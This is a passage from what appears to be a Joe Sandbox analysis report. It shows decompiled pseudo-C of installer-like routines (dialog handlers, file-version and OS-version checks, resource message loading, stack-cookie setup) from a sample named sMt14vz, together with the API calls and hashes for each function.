                                                                                                                                                                                                                                            					SetWindowTextA(_t24, 0x10d9154);
                                                                                                                                                                                                                                            					SetDlgItemTextA(_t24, 0x838,  *0x10d9404);
                                                                                                                                                                                                                                            					SetForegroundWindow(_t24);
                                                                                                                                                                                                                                            					goto L11;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(_t11 == 1) {
                                                                                                                                                                                                                                            					_t22 = _a12;
                                                                                                                                                                                                                                            					if(_t22 < 6) {
                                                                                                                                                                                                                                            						goto L11;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if(_t22 <= 7) {
                                                                                                                                                                                                                                            						L8:
                                                                                                                                                                                                                                            						EndDialog(_a4, _t22);
                                                                                                                                                                                                                                            						return 1;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if(_t22 != 0x839) {
                                                                                                                                                                                                                                            						goto L11;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					 *0x10d91dc = 1;
                                                                                                                                                                                                                                            					goto L8;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return 0;
                                                                                                                                                                                                                                            			}









                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • EndDialog.USER32(?,?), ref: 010D3490
                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 010D349A
                                                                                                                                                                                                                                            • SetWindowTextA.USER32(?,010D9154), ref: 010D34B2
                                                                                                                                                                                                                                            • SetDlgItemTextA.USER32(?,00000838), ref: 010D34C4
                                                                                                                                                                                                                                            • SetForegroundWindow.USER32(?), ref: 010D34CB
                                                                                                                                                                                                                                            • EndDialog.USER32(?,00000002), ref: 010D34D8
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.338526724.00000000010D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338519106.00000000010D0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338553666.00000000010D8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10d0000_sMt14vz.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Window$DialogText$DesktopForegroundItem
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 852535152-0
                                                                                                                                                                                                                                            • Opcode ID: 8fe498293f5a3b04782853b57d54044c5b9b472d99b1da768ace86e6163257c7
                                                                                                                                                                                                                                            • Instruction ID: 6eb429f9da4170dcfc1df63f6114b22e6575caddb1e1d2fe0d9256d932e47ac6
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8fe498293f5a3b04782853b57d54044c5b9b472d99b1da768ace86e6163257c7
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9301B179341324ABD7665F79E80C9AE3AA4FB45750B044014FEC69B984CF3EAA41CB82
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E010D28E8(intOrPtr __ecx, char* __edx, intOrPtr* _a8) {
                                                                                                                                                                                                                                            				void* _v8;
                                                                                                                                                                                                                                            				char* _v12;
                                                                                                                                                                                                                                            				intOrPtr _v16;
                                                                                                                                                                                                                                            				void* _v20;
                                                                                                                                                                                                                                            				intOrPtr _v24;
                                                                                                                                                                                                                                            				int _v28;
                                                                                                                                                                                                                                            				int _v32;
                                                                                                                                                                                                                                            				void* _v36;
                                                                                                                                                                                                                                            				int _v40;
                                                                                                                                                                                                                                            				void* _v44;
                                                                                                                                                                                                                                            				intOrPtr _v48;
                                                                                                                                                                                                                                            				intOrPtr _v52;
                                                                                                                                                                                                                                            				intOrPtr _v56;
                                                                                                                                                                                                                                            				intOrPtr _v60;
                                                                                                                                                                                                                                            				intOrPtr _v64;
                                                                                                                                                                                                                                            				long _t68;
                                                                                                                                                                                                                                            				void* _t70;
                                                                                                                                                                                                                                            				void* _t73;
                                                                                                                                                                                                                                            				void* _t79;
                                                                                                                                                                                                                                            				void* _t83;
                                                                                                                                                                                                                                            				void* _t87;
                                                                                                                                                                                                                                            				void* _t88;
                                                                                                                                                                                                                                            				intOrPtr _t93;
                                                                                                                                                                                                                                            				intOrPtr _t97;
                                                                                                                                                                                                                                            				intOrPtr _t99;
                                                                                                                                                                                                                                            				int _t101;
                                                                                                                                                                                                                                            				void* _t103;
                                                                                                                                                                                                                                            				void* _t106;
                                                                                                                                                                                                                                            				void* _t109;
                                                                                                                                                                                                                                            				void* _t110;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_v12 = __edx;
                                                                                                                                                                                                                                            				_t99 = __ecx;
                                                                                                                                                                                                                                            				_t106 = 0;
                                                                                                                                                                                                                                            				_v16 = __ecx;
                                                                                                                                                                                                                                            				_t87 = 0;
                                                                                                                                                                                                                                            				_t103 = 0;
                                                                                                                                                                                                                                            				_v20 = 0;
                                                                                                                                                                                                                                            				if( *((intOrPtr*)(__ecx + 0x7c)) <= 0) {
                                                                                                                                                                                                                                            					L19:
                                                                                                                                                                                                                                            					_t106 = 1;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t62 = 0;
                                                                                                                                                                                                                                            					_v8 = 0;
                                                                                                                                                                                                                                            					while(1) {
                                                                                                                                                                                                                                            						_v24 =  *((intOrPtr*)(_t99 + 0x80));
                                                                                                                                                                                                                                            						if(E010D2773(_v12,  *((intOrPtr*)(_t62 + _t99 +  *((intOrPtr*)(_t99 + 0x80)) + 0xbc)) + _t99 + 0x84) == 0) {
                                                                                                                                                                                                                                            							goto L20;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t68 = GetFileVersionInfoSizeA(_v12,  &_v32);
                                                                                                                                                                                                                                            						_v28 = _t68;
                                                                                                                                                                                                                                            						if(_t68 == 0) {
                                                                                                                                                                                                                                            							_t99 = _v16;
                                                                                                                                                                                                                                            							_t70 = _v8 + _t99;
                                                                                                                                                                                                                                            							_t93 = _v24;
                                                                                                                                                                                                                                            							_t87 = _v20;
                                                                                                                                                                                                                                            							if( *((intOrPtr*)(_t70 + _t93 + 0x84)) == _t106 &&  *((intOrPtr*)(_t70 + _t93 + 0x88)) == _t106) {
                                                                                                                                                                                                                                            								goto L18;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t103 = GlobalAlloc(0x42, _t68);
                                                                                                                                                                                                                                            							if(_t103 != 0) {
                                                                                                                                                                                                                                            								_t73 = GlobalLock(_t103);
                                                                                                                                                                                                                                            								_v36 = _t73;
                                                                                                                                                                                                                                            								if(_t73 != 0) {
                                                                                                                                                                                                                                            									if(GetFileVersionInfoA(_v12, _v32, _v28, _t73) == 0 || VerQueryValueA(_v36, "\\",  &_v44,  &_v40) == 0 || _v40 == 0) {
                                                                                                                                                                                                                                            										L15:
                                                                                                                                                                                                                                            										GlobalUnlock(_t103);
                                                                                                                                                                                                                                            										_t99 = _v16;
                                                                                                                                                                                                                                            										L18:
                                                                                                                                                                                                                                            										_t87 = _t87 + 1;
                                                                                                                                                                                                                                            										_t62 = _v8 + 0x3c;
                                                                                                                                                                                                                                            										_v20 = _t87;
                                                                                                                                                                                                                                            										_v8 = _v8 + 0x3c;
                                                                                                                                                                                                                                            										if(_t87 <  *((intOrPtr*)(_t99 + 0x7c))) {
                                                                                                                                                                                                                                            											continue;
                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                            											goto L19;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										_t79 = _v44;
                                                                                                                                                                                                                                            										_t88 = _t106;
                                                                                                                                                                                                                                            										_v28 =  *((intOrPtr*)(_t79 + 0xc));
                                                                                                                                                                                                                                            										_t101 = _v28;
                                                                                                                                                                                                                                            										_v48 =  *((intOrPtr*)(_t79 + 8));
                                                                                                                                                                                                                                            										_t83 = _v8 + _v16 + _v24 + 0x94;
                                                                                                                                                                                                                                            										_t97 = _v48;
                                                                                                                                                                                                                                            										_v36 = _t83;
                                                                                                                                                                                                                                            										_t109 = _t83;
                                                                                                                                                                                                                                            										do {
                                                                                                                                                                                                                                            											 *((intOrPtr*)(_t110 + _t88 - 0x34)) = E010D2A89(_t97, _t101,  *((intOrPtr*)(_t109 - 0x10)),  *((intOrPtr*)(_t109 - 0xc)));
                                                                                                                                                                                                                                            											 *((intOrPtr*)(_t110 + _t88 - 0x3c)) = E010D2A89(_t97, _t101,  *((intOrPtr*)(_t109 - 4)),  *_t109);
                                                                                                                                                                                                                                            											_t109 = _t109 + 0x18;
                                                                                                                                                                                                                                            											_t88 = _t88 + 4;
                                                                                                                                                                                                                                            										} while (_t88 < 8);
                                                                                                                                                                                                                                            										_t87 = _v20;
                                                                                                                                                                                                                                            										_t106 = 0;
                                                                                                                                                                                                                                            										if(_v56 < 0 || _v64 > 0) {
                                                                                                                                                                                                                                            											if(_v52 < _t106 || _v60 > _t106) {
                                                                                                                                                                                                                                            												GlobalUnlock(_t103);
                                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                                            												goto L15;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                            											goto L15;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						goto L20;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				L20:
                                                                                                                                                                                                                                            				 *_a8 = _t87;
                                                                                                                                                                                                                                            				if(_t103 != 0) {
                                                                                                                                                                                                                                            					GlobalFree(_t103);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return _t106;
                                                                                                                                                                                                                                            			}


                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GlobalFree.KERNEL32 ref: 010D2A6F
                                                                                                                                                                                                                                              • Part of subcall function 010D2773: CharUpperA.USER32(C2F4ED82,00000000,00000000,00000000), ref: 010D27A8
                                                                                                                                                                                                                                              • Part of subcall function 010D2773: CharNextA.USER32(0000054D), ref: 010D27B5
                                                                                                                                                                                                                                              • Part of subcall function 010D2773: CharNextA.USER32(00000000), ref: 010D27BC
                                                                                                                                                                                                                                              • Part of subcall function 010D2773: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 010D2829
                                                                                                                                                                                                                                              • Part of subcall function 010D2773: RegQueryValueExA.ADVAPI32(?,010D1140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 010D2852
                                                                                                                                                                                                                                              • Part of subcall function 010D2773: ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 010D2870
                                                                                                                                                                                                                                              • Part of subcall function 010D2773: RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 010D28A0
                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?,?,?,?,?,010D3938,?,?,?,?,-00000005), ref: 010D2958
                                                                                                                                                                                                                                            • GlobalLock.KERNEL32 ref: 010D2969
                                                                                                                                                                                                                                            • GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,010D3938,?,?,?,?,-00000005,?), ref: 010D2A21
                                                                                                                                                                                                                                            • GlobalUnlock.KERNEL32(00000000,?,?,?,?), ref: 010D2A81
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.338526724.00000000010D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338519106.00000000010D0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338553666.00000000010D8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10d0000_sMt14vz.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Global$Char$NextUnlock$AllocCloseEnvironmentExpandFreeLockOpenQueryStringsUpperValue
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3949799724-0
                                                                                                                                                                                                                                            • Opcode ID: 825103011987a8619dec091d1561dd23bd3f8550c42c478a3723d93ef8c3633a
                                                                                                                                                                                                                                            • Instruction ID: acbed8dadf80460c5825b17ac886ccf070cc8a617c83b540e95374752c01ba9a
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 825103011987a8619dec091d1561dd23bd3f8550c42c478a3723d93ef8c3633a
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 15512A31E00219DFDB21DF9CC884AAEFBB5FF48701F14816AE985E3211DB359941CBA5
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 32%
                                                                                                                                                                                                                                            			E010D4169(void* __eflags) {
                                                                                                                                                                                                                                            				int _t18;
                                                                                                                                                                                                                                            				void* _t21;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t20 = E010D468F("FINISHMSG", 0, 0);
                                                                                                                                                                                                                                            				_t21 = LocalAlloc(0x40, 4 + _t3 * 4);
                                                                                                                                                                                                                                            				if(_t21 != 0) {
                                                                                                                                                                                                                                            					if(E010D468F("FINISHMSG", _t21, _t20) != 0) {
                                                                                                                                                                                                                                            						if(lstrcmpA(_t21, "<None>") == 0) {
                                                                                                                                                                                                                                            							L7:
                                                                                                                                                                                                                                            							return LocalFree(_t21);
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_push(0);
                                                                                                                                                                                                                                            						_push(0x40);
                                                                                                                                                                                                                                            						_push(0);
                                                                                                                                                                                                                                            						_push(_t21);
                                                                                                                                                                                                                                            						_t18 = 0x3e9;
                                                                                                                                                                                                                                            						L6:
                                                                                                                                                                                                                                            						E010D44B9(0, _t18);
                                                                                                                                                                                                                                            						goto L7;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                                            					_push(0x10);
                                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                                            					_t18 = 0x4b1;
                                                                                                                                                                                                                                            					goto L6;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E010D44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            			}






                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 010D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010D46A0
                                                                                                                                                                                                                                              • Part of subcall function 010D468F: SizeofResource.KERNEL32(00000000,00000000,?,010D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010D46A9
                                                                                                                                                                                                                                              • Part of subcall function 010D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010D46C3
                                                                                                                                                                                                                                              • Part of subcall function 010D468F: LoadResource.KERNEL32(00000000,00000000,?,010D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010D46CC
                                                                                                                                                                                                                                              • Part of subcall function 010D468F: LockResource.KERNEL32(00000000,?,010D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010D46D3
                                                                                                                                                                                                                                              • Part of subcall function 010D468F: memcpy_s.MSVCRT ref: 010D46E5
                                                                                                                                                                                                                                              • Part of subcall function 010D468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010D46EF
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,?,00000000,00000000,00000105,00000000,010D30B4), ref: 010D4189
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,?,00000000,00000000,00000105,00000000,010D30B4), ref: 010D41E7
                                                                                                                                                                                                                                              • Part of subcall function 010D44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 010D4518
                                                                                                                                                                                                                                              • Part of subcall function 010D44B9: MessageBoxA.USER32(?,?,010D9154,00010010), ref: 010D4554
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.338526724.00000000010D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338519106.00000000010D0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338553666.00000000010D8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10d0000_sMt14vz.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                                                            • String ID: <None>$FINISHMSG
                                                                                                                                                                                                                                            • API String ID: 3507850446-3091758298
                                                                                                                                                                                                                                            • Opcode ID: 30e99ee1df7182d1bff3a69ee56f7802e6334c3c87a597f053dce26fe9eab285
                                                                                                                                                                                                                                            • Instruction ID: e6133ef353932fbbf77feaba1598881907ad9f0502a061f724bf21aec2f4ad7e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 30e99ee1df7182d1bff3a69ee56f7802e6334c3c87a597f053dce26fe9eab285
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9F01F4B9701315BBF3251A798C85FBB658EDBD86D5F004025BBC6E29C4DE79CC0141B5
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E010D7155() {
                                                                                                                                                                                                                                            				void* _v8;
                                                                                                                                                                                                                                            				struct _FILETIME _v16;
                                                                                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                                                                                            				union _LARGE_INTEGER _v24;
                                                                                                                                                                                                                                            				signed int _t23;
                                                                                                                                                                                                                                            				signed int _t36;
                                                                                                                                                                                                                                            				signed int _t37;
                                                                                                                                                                                                                                            				signed int _t39;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
                                                                                                                                                                                                                                            				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
                                                                                                                                                                                                                                            				_t23 =  *0x10d8004; // 0xc2f4ed82
                                                                                                                                                                                                                                            				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
                                                                                                                                                                                                                                            					GetSystemTimeAsFileTime( &_v16);
                                                                                                                                                                                                                                            					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
                                                                                                                                                                                                                                            					_v8 = _v8 ^ GetCurrentProcessId();
                                                                                                                                                                                                                                            					_v8 = _v8 ^ GetCurrentThreadId();
                                                                                                                                                                                                                                            					_v8 = GetTickCount() ^ _v8 ^  &_v8;
                                                                                                                                                                                                                                            					QueryPerformanceCounter( &_v24);
                                                                                                                                                                                                                                            					_t36 = _v20 ^ _v24.LowPart ^ _v8;
                                                                                                                                                                                                                                            					_t39 = _t36;
                                                                                                                                                                                                                                            					if(_t36 == 0xbb40e64e || ( *0x10d8004 & 0xffff0000) == 0) {
                                                                                                                                                                                                                                            						_t36 = 0xbb40e64f;
                                                                                                                                                                                                                                            						_t39 = 0xbb40e64f;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					 *0x10d8004 = _t39;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t37 =  !_t36;
                                                                                                                                                                                                                                            				 *0x10d8008 = _t37;
                                                                                                                                                                                                                                            				return _t37;
                                                                                                                                                                                                                                            			}












                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 010D7182
                                                                                                                                                                                                                                            • GetCurrentProcessId.KERNEL32 ref: 010D7191
                                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 010D719A
                                                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 010D71A3
                                                                                                                                                                                                                                            • QueryPerformanceCounter.KERNEL32(?), ref: 010D71B8
Memory Dump Source
• Source File: 00000002.00000002.338526724.00000000010D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 010D0000, based on PE: true
• Associated: 00000002.00000002.338519106.00000000010D0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.338553666.00000000010D8000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.338572992.00000000010DA000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.338572992.00000000010DC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1445889803-0
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 93%
                                                                                                                                                                                                                                            			E010D19E0(void* __ebx, void* __edi, struct HWND__* _a4, intOrPtr _a8, int _a12, int _a16) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v520;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t11;
                                                                                                                                                                                                                                            				void* _t14;
                                                                                                                                                                                                                                            				void* _t23;
                                                                                                                                                                                                                                            				void* _t27;
                                                                                                                                                                                                                                            				void* _t33;
                                                                                                                                                                                                                                            				struct HWND__* _t34;
                                                                                                                                                                                                                                            				signed int _t35;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t33 = __edi;
                                                                                                                                                                                                                                            				_t27 = __ebx;
                                                                                                                                                                                                                                            				_t11 =  *0x10d8004; // 0xc2f4ed82
                                                                                                                                                                                                                                            				_v8 = _t11 ^ _t35;
                                                                                                                                                                                                                                            				_t34 = _a4;
                                                                                                                                                                                                                                            				_t14 = _a8 - 0x110;
                                                                                                                                                                                                                                            				if(_t14 == 0) {
                                                                                                                                                                                                                                            					_t32 = GetDesktopWindow();
                                                                                                                                                                                                                                            					E010D43D0(_t34, _t15);
                                                                                                                                                                                                                                            					_v520 = 0;
                                                                                                                                                                                                                                            					LoadStringA( *0x10d9a3c, _a16,  &_v520, 0x200);
                                                                                                                                                                                                                                            					SetDlgItemTextA(_t34, 0x83f,  &_v520);
                                                                                                                                                                                                                                            					MessageBeep(0xffffffff);
                                                                                                                                                                                                                                            					goto L6;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					if(_t14 != 1) {
                                                                                                                                                                                                                                            						L4:
                                                                                                                                                                                                                                            						_t23 = 0;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_t32 = _a12;
                                                                                                                                                                                                                                            						if(_t32 - 0x83d > 1) {
                                                                                                                                                                                                                                            							goto L4;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							EndDialog(_t34, _t32);
                                                                                                                                                                                                                                            							L6:
                                                                                                                                                                                                                                            							_t23 = 1;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E010D6CE0(_t23, _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                                                                                                                                                                                                                            			}














                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • EndDialog.USER32(?,?), ref: 010D1A18
                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 010D1A24
                                                                                                                                                                                                                                            • LoadStringA.USER32(?,?,00000200), ref: 010D1A4F
                                                                                                                                                                                                                                            • SetDlgItemTextA.USER32(?,0000083F,00000000), ref: 010D1A62
                                                                                                                                                                                                                                            • MessageBeep.USER32(000000FF), ref: 010D1A6A
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.338526724.00000000010D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338519106.00000000010D0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338553666.00000000010D8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10d0000_sMt14vz.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1273765764-0
                                                                                                                                                                                                                                            • Opcode ID: d7fa130e327a9071497ff925ecb89134af7aa0d6b0df26bfd28b568b04eb8fe7
                                                                                                                                                                                                                                            • Instruction ID: ebaf1d70772a39f89c8d54c1f984b33c8d43b2655ecd1da68270f319b5850cab
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d7fa130e327a9071497ff925ecb89134af7aa0d6b0df26bfd28b568b04eb8fe7
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 02118E3160121AABDB20EF78D908AAE77F8EB49250F008195F99293185DE359E01CB96
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 75%
                                                                                                                                                                                                                                            			E010D36EE(CHAR* __ecx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				struct _OSVERSIONINFOA _v416;
                                                                                                                                                                                                                                            				signed int _v420;
                                                                                                                                                                                                                                            				signed int _v424;
                                                                                                                                                                                                                                            				CHAR* _v428;
                                                                                                                                                                                                                                            				CHAR* _v432;
                                                                                                                                                                                                                                            				signed int _v436;
                                                                                                                                                                                                                                            				CHAR* _v440;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t72;
                                                                                                                                                                                                                                            				CHAR* _t77;
                                                                                                                                                                                                                                            				CHAR* _t91;
                                                                                                                                                                                                                                            				CHAR* _t94;
                                                                                                                                                                                                                                            				int _t97;
                                                                                                                                                                                                                                            				CHAR* _t98;
                                                                                                                                                                                                                                            				signed char _t99;
                                                                                                                                                                                                                                            				CHAR* _t104;
                                                                                                                                                                                                                                            				signed short _t107;
                                                                                                                                                                                                                                            				signed int _t109;
                                                                                                                                                                                                                                            				short _t113;
                                                                                                                                                                                                                                            				void* _t114;
                                                                                                                                                                                                                                            				signed char _t115;
                                                                                                                                                                                                                                            				short _t119;
                                                                                                                                                                                                                                            				CHAR* _t123;
                                                                                                                                                                                                                                            				CHAR* _t124;
                                                                                                                                                                                                                                            				CHAR* _t129;
                                                                                                                                                                                                                                            				signed int _t131;
                                                                                                                                                                                                                                            				signed int _t132;
                                                                                                                                                                                                                                            				CHAR* _t135;
                                                                                                                                                                                                                                            				CHAR* _t138;
                                                                                                                                                                                                                                            				signed int _t139;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t72 =  *0x10d8004; // 0xc2f4ed82
                                                                                                                                                                                                                                            				_v8 = _t72 ^ _t139;
                                                                                                                                                                                                                                            				_v416.dwOSVersionInfoSize = 0x94;
                                                                                                                                                                                                                                            				_t115 = __ecx;
                                                                                                                                                                                                                                            				_t135 = 0;
                                                                                                                                                                                                                                            				_v432 = __ecx;
                                                                                                                                                                                                                                            				_t138 = 0;
                                                                                                                                                                                                                                            				if(GetVersionExA( &_v416) != 0) {
                                                                                                                                                                                                                                            					_t133 = _v416.dwMajorVersion;
                                                                                                                                                                                                                                            					_t119 = 2;
                                                                                                                                                                                                                                            					_t77 = _v416.dwPlatformId - 1;
                                                                                                                                                                                                                                            					__eflags = _t77;
